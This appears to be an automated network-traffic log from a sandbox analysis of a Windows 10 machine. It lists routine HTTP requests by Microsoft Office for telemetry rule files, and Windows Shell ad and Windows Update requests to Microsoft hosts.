Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123143Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ef5c9b82dea54203b104cec805379d04&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-88000045&oemName=pfqgsn%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=pfqgsn20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AASp0AqrsC9r/xwFl+z2y2UsBJJfgRDz+895SPUhgR6pcAWcIIP2oJrW+1j3pNyTqKgRupi9+l1kJ+SvaCNMGWfE3cO1gKXxNKCEWczPo11P7s99D0mu8SGlDRLLPM9Mx0hF41kYjjomrPdDZomjT9UrkuKHyTa2lMdMuGh8DCwVmwaOHHA3EEUvZ0kds4UxJFdn7A28+lzZrl4opVyHpcs6tRluUJlzTmpHAcryi7aGuNd2Lg1eVpOSOGqEeqRw0Rx7XgSH5lttOsQd4lOIs4P1GKZE/GpqSa+tC+5pa1uv0S9Au/bTolRfZjx08hfs8hLfG289zNOES14CScPq2tMgQZgAAEELAwAzTUGUV43IS9cSUt6CwAZ5xTWQmNtlbI5yvrvYJoeDM6i2cwWhkErkXIaLcjq73TIdKjP2imZldo5PjlIxcH7jnWIrBQHB5N6oqBC/AOvAr3B9EckkAGJVnp1U8XuiOsWHmc1Svv3Vlc2+nwnIMfGB8YvtWGXBRm9soCCLXYtGi1QiDpUb6hSuyecduMUfRe3wgWg8RRTaVo9VJ4O2P0SfBiFMI3H8GL+E2SlbVob12epGXjSdveoFPe1EuNabu7NSH/abk/F1XuxAqWqreCrITO1J8F9JyOvi+5dWRtV8XTvAVcCpk/jDsuQy9IjipdZVEXDXgPxwO+TTcNSy5u/mXS/p4R7jtRGA955fu6tfG/o0Ijltx+mmBuT9iaS9kvikqQl8kYh4RIOyu7xDPAX9Rh9nGtOYwbmP4P+KXUI2aglfUThAiyek9mKSls8yNMzbH9frwIClkcwY0P4DRwz0igqszKMwQh8cTjiz5t9qMW2xf6+1Ypf30Y8nWKRSpviHkAzCcPn9jvLMCB2PdZeGEx0Dvh0u4iPjedZl7YVkLln+0417uqBSxq/zPGV+aTWsEPBKVvFTRNGVasjBYhtgB&p=Cache-Control: no-cacheMS-CV: HD2UmYvMS0W21TQJ.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8rIdI2f7TAgV0fWA4xBNeCTVUCUzRihPMdFqQEB6djcaqoOqla3lmkFADcyin24pa38fROLhpUPuImfZ3LxvNDTrA5u_dkqdDxq-2llIR-5YyITPigvfs6NsrCBI4I1hwzyqbJjcAK4devJxwJch0yHfuLUJgFZLrN1skS1oalKbvLbQ4%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3D4c0619cfda581ab7e0f47e9a4bcc54bd&TIME=20241208T123143Z&CID=531538185&EID=531538185&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /aes/c.gif?RG=0a872d6254a34c63961b7276d8885189&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20241208T123144Z&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: www.bing.comConnection: Keep-AliveCookie: MUID=0762B76A2A0E624A0D08A2252B7C63F0
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8rIdI2f7TAgV0fWA4xBNeCTVUCUzRihPMdFqQEB6djcaqoOqla3lmkFADcyin24pa38fROLhpUPuImfZ3LxvNDTrA5u_dkqdDxq-2llIR-5YyITPigvfs6NsrCBI4I1hwzyqbJjcAK4devJxwJch0yHfuLUJgFZLrN1skS1oalKbvLbQ4%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3D4c0619cfda581ab7e0f47e9a4bcc54bd&TIME=20241208T123144Z&CID=531538185&EID=&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-AliveCookie: MUID=0762B76A2A0E624A0D08A2252B7C63F0; _EDGE_S=SID=13F97BD35778634103906E9C56606285; MR=0
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F6mZw79N1evM2Hy&MD=+abDNPzz HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
